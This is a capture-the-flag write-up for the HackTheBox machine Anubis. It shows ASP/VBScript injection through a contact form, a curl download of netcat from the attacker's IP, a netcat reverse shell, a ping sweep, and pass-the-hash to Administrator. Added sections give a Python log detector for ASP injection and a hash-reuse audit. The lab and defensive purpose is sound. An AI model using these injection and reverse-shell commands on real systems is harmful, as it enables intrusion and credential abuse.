CTF-Writeups/HackTheBox/Anubis.md
2022-02-02 21:17:16 +05:00


HackTheBox-Anubis

NMAP

```
PORT      STATE SERVICE       REASON          VERSION
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
443/tcp   open  ssl/http      syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=www.windcorp.htb
| Subject Alternative Name: DNS:www.windcorp.htb
| Issuer: commonName=www.windcorp.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-05-24T19:44:56
| Not valid after:  2031-05-24T19:54:56
|_  http/1.1
445/tcp   open  microsoft-ds? syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49715/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 29263/tcp): CLEAN (Timeout)
|   Check 2 (port 29705/tcp): CLEAN (Timeout)
|   Check 3 (port 30756/udp): CLEAN (Timeout)
|   Check 4 (port 64422/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-08-15T05:00:49
|_  start_date: N/A
```

PORT 139/445 (SMB)

We can see that SMB is running, but we can't access any shares anonymously.

So let's move on to HTTPS.

PORT 443 (HTTPS)

If we visit the HTTPS port directly we get a 404 Not Found, but the nmap scan shows that the SSL certificate carries the domain name www.windcorp.htb, so let's add it to our /etc/hosts file.

I tried running gobuster to fuzz for files and directories but found nothing interesting.

So I scrolled down and saw a contact form where we can send a message. I intercepted the request to see whether it actually sends one.

It takes the input fields as GET parameter values to save.php and then brings us to preview.php to ask for confirmation.

After that nothing happens. I ran gobuster again, this time specifying the asp extension, and saw that a file Test.asp had been created containing the message details we gave.

The message details we entered in the contact form are shown inside an ASP page (Active Server Pages, the framework for building web pages on IIS / Windows Server). Since our input is written into a file that IIS executes, we can try to include ASP syntax; a basic check is:

```asp
<% Response.write("Hello") %>
```

Make sure to URL-encode it when you submit it through Burp Suite.

And it gets rendered. We can also try supplying invalid syntax to confirm the page is really being parsed as ASP.

So we can definitely run any ASP syntax, or even a VBScript script, here. In order to get command execution we can do something like this (see the following thread):

https://www.tek-tips.com/viewthread.cfm?qid=180982

```asp
<%
Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd /c ping 10.10.14.18 ", 1, True
%>
```

Now we have command execution, so we can simply upload a netcat executable for Windows to C:\Windows\Temp and then call it to get a reverse shell.

```asp
<%
Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd /c curl http://10.10.14.18/nc64.exe -o C:\Windows\Temp\nc.exe ", 1, True
%>
```

It made a request to download netcat, so now we just need to execute it.

```asp
<%
Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd /c C:\Windows\Temp\nc.exe 10.10.14.18 4444 -e cmd.exe ", 1, True
%>
```
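From a defender's side, the injection path above leaves a clear trace: the contact-form fields travel as GET parameters to save.php, so ASP delimiters (`<%`, `%>`) or calls such as `CreateObject(` / `WScript.Shell` inside those parameters are a strong signal in the IIS access log, even when the attacker URL-encodes (or double-encodes) them. The following Python script is an added example, not part of the original writeup or of the box; it parses constructed IIS W3C-format log lines (the field list, sample requests and client addresses are all made up for the example) and flags such requests.

```python
"""Flag ASP code-injection attempts in the query string of IIS W3C access logs.

Added example for the writeup above; the log lines below are constructed.
"""
import re
from urllib.parse import parse_qs, unquote

# Markers of server-side ASP/VBScript smuggled through form fields: the ASP
# delimiters seen in the writeup plus the calls used to reach WScript.Shell.
ASP_MARKERS = re.compile(
    r"<%|%>|CreateObject\s*\(|WScript\.Shell|Response\.Write",
    re.IGNORECASE,
)

# Constructed sample log in IIS W3C extended format (not from the real box).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2021-08-15 05:00:49 10.10.10.1 GET /save.php name=alice&email=alice%40example.com&message=Hello+there 443 10.10.14.5 302
2021-08-15 05:01:10 10.10.10.1 GET /save.php name=bob&email=b%40example.com&message=%3C%25+Response.write%28%22Hello%22%29+%25%3E 443 10.10.14.18 302
2021-08-15 05:02:33 10.10.10.1 GET /save.php name=eve&email=e%40example.com&message=%253C%2525+Set+objShell+%3D+CreateObject%28%22WScript.Shell%22%29+%2525%253E 443 10.10.14.18 302
2021-08-15 05:03:00 10.10.10.1 GET /index.html - 443 10.10.14.5 200
"""


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are not missed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_iis_log(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if raw.startswith("#") or not raw.strip() or fields is None:
            continue
        parts = raw.split()
        if len(parts) != len(fields):  # malformed line; skip rather than guess
            continue
        yield dict(zip(fields, parts))


def find_asp_injection(text, script_paths=("/save.php",)):
    """Return findings for requests to script_paths whose parameters carry ASP code."""
    findings = []
    for entry in parse_iis_log(text):
        if entry.get("cs-uri-stem") not in script_paths:
            continue
        query = entry.get("cs-uri-query", "-")
        if query == "-":
            continue
        # parse_qs decodes one layer; decode_fully handles any extra layers.
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                decoded = decode_fully(value)
                match = ASP_MARKERS.search(decoded)
                if match:
                    findings.append({
                        "time": f"{entry['date']} {entry['time']}",
                        "client": entry["c-ip"],
                        "param": name,
                        "marker": match.group(0),
                        "value": decoded,
                    })
    return findings


if __name__ == "__main__":
    for hit in find_asp_injection(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} param={hit['param']} marker={hit['marker']!r}: {hit['value']}")
```

The detection is a stopgap; the root cause is that untrusted form input is written into a file with an executable extension (Test.asp) under the web root. Storing submissions as data (a database row or a .txt outside the web root) and HTML-encoding them on display removes the bug entirely.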

Even though we are authority\system, the hostname is webserver01, and the IP address suggests we are inside a containerized environment.

We need to break out of this containerized Windows Server environment. Looking at the users, we see a container user and Administrator.

But there isn't anything in those directories other than req.txt in Administrator's folder.

This looks like an SSL certificate, so we can use any online tool to decode it into clear-text form:

https://certlogik.com/decoder/

We get a subdomain softwareportal.windcorp.htb.

The container's addressing is ip 172.23.176.172, dg 172.23.176.1, 172.23.191.255, so we can ping sweep the neighbouring range from PowerShell:

```powershell
1..255 | % {echo "172.23.191.$_"; ping -n 1 -w 100 172.23.191.$_} | Select-String ttl
```

Unintended Way

We could get a meterpreter shell and dump the hashes through it.

On dumping we see some hashes, and it is fairly rare to find that a pass-the-hash attack works here: trying the iisadmin hash against the Administrator user succeeds.

We get a Pwn3d!, which means we can now get a shell.

Doing whoami through this shell confirms it.

Alternatively we could use Metasploit without needing the Impacket scripts; there's a psexec module in Metasploit that we can use to get a shell.

To get a fully functional meterpreter shell we need to upload the meterpreter payload and execute it: upload the payload, start another meterpreter listener, then run it.

We can dump hashes using `hashdump` and see that the Administrator's hash does match `iisadmin`'s.
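The reason the unintended path works is password reuse: the Administrator account and iisadmin share one NT hash, so whoever holds the service account's hash holds the admin's. That is exactly what a credential-hygiene audit should catch before an attacker does. The script below is an added example, not from the writeup or the box: it parses a pwdump/hashdump-style listing (`user:rid:lm:nt:::`) and reports NT hashes shared by more than one account, accounts with an empty password, and any reuse that involves a privileged account. The sample dump and its hash values are constructed and belong to no real account; only the empty-password NT hash is the well-known real constant.

```python
"""Audit a hashdump-style listing for NT-hash reuse across accounts.

Added example for the writeup above; the dump below is constructed.
"""
import re
from collections import defaultdict

HASHDUMP_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::\s*$"
)

# NT hash of the empty password (MD4 of the empty UTF-16LE string); a real constant.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in pwdump/hashdump format. The NT hashes are made up;
# Administrator and iisadmin deliberately share one, mirroring the writeup.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
iisadmin:1003:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
svc_backup:1004:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_hashdump(text):
    """Parse user:rid:lm:nt::: lines; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = HASHDUMP_LINE.match(line.strip())
        if m:
            entries.append({"user": m["user"], "rid": int(m["rid"]), "nt": m["nt"].lower()})
    return entries


def audit_hash_reuse(text, privileged=("Administrator",)):
    """Group accounts by NT hash and report reuse, empty passwords and privileged overlap.

    An account counts as privileged if it is named in `privileged` or has the
    well-known built-in Administrator RID 500.
    """
    entries = parse_hashdump(text)
    by_hash = defaultdict(list)
    for e in entries:
        by_hash[e["nt"]].append(e["user"])

    privileged_users = {e["user"] for e in entries if e["user"] in privileged or e["rid"] == 500}
    empty_password = list(by_hash.get(EMPTY_NT, []))
    # Shared hashes mean a shared password; the empty hash is reported separately.
    shared = {h: users for h, users in by_hash.items() if len(users) > 1 and h != EMPTY_NT}

    privileged_reuse = []
    for users in shared.values():
        for p in sorted(privileged_users & set(users)):
            privileged_reuse.extend((p, u) for u in users if u != p)

    return {
        "shared": shared,
        "empty_password": empty_password,
        "privileged_reuse": privileged_reuse,
    }


if __name__ == "__main__":
    report = audit_hash_reuse(SAMPLE_DUMP)
    for h, users in report["shared"].items():
        print(f"shared NT hash {h}: {', '.join(users)}")
    print("empty password:", ", ".join(report["empty_password"]) or "none")
    for priv, other in report["privileged_reuse"]:
        print(f"WARNING: privileged account {priv} shares its password with {other}")
```

Run over a real dump the same way (the parser ignores anything that is not a `user:rid:lm:nt:::` line), and treat every entry in `privileged_reuse` as a finding to rotate: once a service account's hash equals the Administrator's, the pass-the-hash step in this writeup needs no cracking at all.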

We got root on the actual host machine via the unintended way, which would get patched, so in the end the intended route is always the way to go.